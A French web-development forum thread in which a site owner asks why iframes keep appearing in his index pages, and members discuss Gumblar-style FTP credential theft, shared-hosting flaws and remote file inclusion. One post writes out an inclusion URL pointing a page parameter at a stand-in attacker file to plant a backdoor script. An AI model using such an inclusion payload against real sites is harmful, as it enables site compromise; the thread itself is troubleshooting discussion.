Discussion :

[sws2008]

bonjour
j'ai un problème, mon site est hébergé sur un serveur unix et j'utilise les requêtes préparées, les fonction htmlentities() et strip_tag()
J'ais des iframes qui se mettent dans mes pages avez vous une aidée comme pourrais je réglé ce problème ?

[FoxLeRenard]

bonjour
j'ai un problème, mon site est hébergé sur un serveur unix et j'utilise les requêtes préparées, les fonction htmlentities() et strip_tag()
J'ais des iframes qui se mettent dans mes pages avez vous une aidée comme pourrais je réglé ce problème ?

Bonjour,
ton site possédes peut'étre des saisies ou des liens type GET
c'est a dire liés a ton URL ?

En plus pourrais tu dire si tu as des includes liés a ces GET

[sws2008]

pour les url je transfert des fois des paramêtre mais chaque fois que je transfert des parametre via l'url je controle via la fonction intval()
et des include non et du coté base de données j'utilise l'api pdo te les requêtes preparer

[FoxLeRenard]

pour les url je transfert des fois des paramêtre mais chaque fois que je transfert des parametre via l'url je controle via la fonction intval()
et des include non et du coté base de données j'utilise l'api pdo te les requêtes preparer

il n'empéche que les injections de Mysql doivent bien étres protégées !
et tes GET devraient avoir un autre contôle ensuite si ta variable résultante est $monget tu n'utilises plus que celle-la, jamais plus le GET

[sws2008]

merci FoxLeRenard pour tes réponse mais peut tu clarifier un peux plus.
et dans mon cas pourquoi dans la page index seulement ou je trouve du code étrangé (des iframes)

[FoxLeRenard]

merci FoxLeRenard pour tes réponse mais peut tu clarifier un peux plus.
et dans mon cas pourquoi dans la page index seulement ou je trouve du code étrangé (des iframes)

Tu veux dire que si par FTP tu récupéres ton index.php
il n'est plus le même que ton original ?

Alors peux tu le poster en entier ici et si tu l'acceptes nous donner l' URL de ton web qu'un test d'intrusion soit réalisé.

Si ça te génes, exeptionellement mets moi ton URL en MP

[Invité]

Bonjour,
j'ai eu ce problème récemment.
Voici un lien qui explique le problème :
http://wiki.lws-hosting.com/doku.php...nte_de_gumblar

VIRUS. Une nouvelle variante de Gumblar.
Virus qui rajoute dans les *index* et dans *main*

Il contaminait les fichiers par FTP donc avait le mot de passe (!).
Il ne vous reste alors plus qu'à très rapidement :
1.Changer votre mot de passe FTP
2.Scanner tous les ordis qui pourraient avoir été utilisé ce mot de passe d'une façon ou d'une autre.
Mettre à jour Adobe Flash et Adobe Reader sur ces ordis
3.nettoyer les fichiers infectés (ou les re-uploader)

[FoxLeRenard]

Bonjour,
j'ai eu ce problème récemment.
Voici un lien qui explique le problème :
http://wiki.lws-hosting.com/doku.php...nte_de_gumblar

Tu vois l'Ami, si il existe une donnée qui ne figures pas de façon visible
sur un serveur, c'est bien le mdp du FTP !! alors donner comme reméde a la présence d'iframes dans un PHP , l'explication qu'il faut changer le mot de passe du FTP etc ... c'est n'avoir aucune idée (heureusement) de comment font ceux qui pénétrent sur un site et écrivent quoi que ce soit dans un PHP

J'ais décris hier le mécanisme (un des mécanismes) employé !


Au départ nous croyons qu' il existe une faille de FTP ??
Ors sur un bon serveur, qui aurait eu le code FTP et comment
Alors le coupable ?
Bien sur le trou énorme par un GET,

Mais c 'est quoi ces fichiers PHP et d' ou vient' il ?

Tout bétement que lorsqu'un serveur éxécute un PHP situé SUR le serveur, ce PHP a tout les droits
du reste quand on voit comment PHPBB s'installe, crées des répertoires en change les protections, généres toutes les pages Mysql etc...

Alors c' est simple il me faut mettre au moins un PHP SUR un serveur

Mais voyons il y est déjas ce PHP !!
mapageprincipale.php

puisque tout include dans un PHP ne fait qu'augmenter sa taille et son nombre d'instructions, mais son nom est le même et ses droit aussi bien sur


Alors je fais

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

mapageprincipale.php?contenu=http://www.xxx.com/pirate.txt

et dans pirate.txt j'écris le code de génération sur le serveur de mon PHP a moi qui m servira de porte d'entrée a tout ce que je veux !

[Invité]

Cher FoxLeRenard,
le lien fourni ci-dessus m'a été communiqué par le service "assistance" de mon hébergeur.

La seule faille dans ton raisonnement, c'est que MON site infecté est entièrement composé de page html !
La seule page en php est contact.php, et le formulaire est en method="post".
Pas de GET, ni de base de données.

Si le virus n'est pas passé par le FTP, je penche pour une faille chez l'hébergeur lui-même.
Le virus a créé une page main.php (c'est ce qui m'a mis la puce à l'oreille, et que j'ai donc effacé),
créé des fichier index.php infectés dans des dossiers (dossiers images),
et ajouté une iframe "parasite" dans ma page index.htm principale.

[FoxLeRenard]

Cher FoxLeRenard,
Le virus a créé une page main.php (c'est ce qui m'a mis la puce à l'oreille, et que j'ai donc effacé),
créé des fichier index.php infectés dans des dossiers (dossiers images),
et ajouté une iframe "parasite" dans ma page index.htm principale.

Ah oui c' est bien ce que je dis !! il suffit d'un seul PHP et c'est fichu ...
mets nous ton URL de site web et je vais voir ça.
(si tu ne veux pas ,exeptionnellement mets moi le en MP.)
Surement le serveur n'y est pour rien !

[FoxLeRenard]

Cher FoxLeRenard,
le lien fourni ci-dessus m'a été communiqué par le service "assistance" de mon hébergeur.

Aprés test, il semblerait que tout les répertoires soient protégés.
Alors c'est le serveur lui même qui a un trou

[0x66656C6978]

Tu vois l'Ami, si il existe une donnée qui ne figures pas de façon visible
sur un serveur, c'est bien le mdp du FTP !!

Faux, beaucoup d'administrateurs mettent les mêmes mots de passes pour leur user SQL & FTP. Donc si l'on arrive à voir le code source, il est possible des fois de sse connecter sur le FTP. et si ce n'est pas le cas, on teste d'autres trucs, édition de fichiers sur le serveur grâce à SQL. Dump des fichiers de configuration des consoles web permettant l'administration de MySQL (par exemple) possédant le mdp root de MySQL (souvent là aussi les mêmes que celui de la box)

Tout bétement que lorsqu'un serveur éxécute un PHP situé SUR le serveur, ce PHP a tout les droits

Non, il n'a pas tous les droits, seulement ceux que possède l'utilisateur UNIX qui execute PHP. DOnc tu ne peux (en principe) pas modifier l'intégralité des fichiers sur le serveur mais quelques fichiers restreind. Sans parler des différentes options php qui permettent encore plus de restreindre ces droits.

Alors c' est simple il me faut mettre au moins un PHP SUR un serveur

Hien ?!


Pour les solutions, regarde si :

- Tu es sur un serveur mutualisé, dans ce cas, c'est la meilleure porte ouverte aux pirates car la plupart des sociétés possédant des mutualisés ne sont pas expertes en sécurité. Il y a trop souvent des trous de sécu dans la configuration de leur serveur permettant ainsi aux pirates d'attaquer à partir d'un site, d'autres sites sur le serveur.

- Regardes pour de vue des bulletins de sécurité du logiciel ftp utilisé par le serveur. Souvent, certains outils de fuzzing permettent de déceler certaines failles.

- Change ton mot de passe FTP (sait-on jamais).

[FoxLeRenard]

Oui il y a mille choses a dire sur le sujet, le tout est que chacunapporte sa pierre a l'édifice.

beaucoup d'administrateurs mettent les mêmes mots de passes pour leur user SQL & FTP. Donc si l'on arrive à voir le code source, il est possible des fois de sse connecter sur le FTP. et si ce n'est pas le cas, on teste d'autres trucs, édition de fichiers sur le serveur grâce à SQL. Dump des fichiers de configuration des consoles web permettant l'administration de MySQL (par exemple) possédant le mdp root de MySQL (souvent là aussi les mêmes que celui de la box)

Oui alors la avoues que ce n'est pas trés chanceux, un serveur qui exprés mets le même mot de passe en FTP et sur PHPMYADMIN, et en plus le hackeur arrive a voir le fichier ou tu caches ce mot de passe, alors s'il te plait ne dis pas faux, mais par exemple
"Il existe aussi de nombreux cas ou ..."


pour les PHP

Non, il n'a pas tous les droits, seulement ceux que possède l'utilisateur UNIX qui execute PHP. DOnc tu ne peux (en principe) pas modifier l'intégralité des fichiers sur le serveur mais quelques fichiers restreind. Sans parler des différentes options php qui permettent encore plus de restreindre ces droits.

Tout a fait Ok avec toi, mais tu sais qu'en géénral sur un serveur ça vit, donc on upload des images etc ... alors tu as l'air de t'y connaitre tu vois bien tout ce que cela ouvre comme portes.

Voila construisons ensemble c'est plus sympa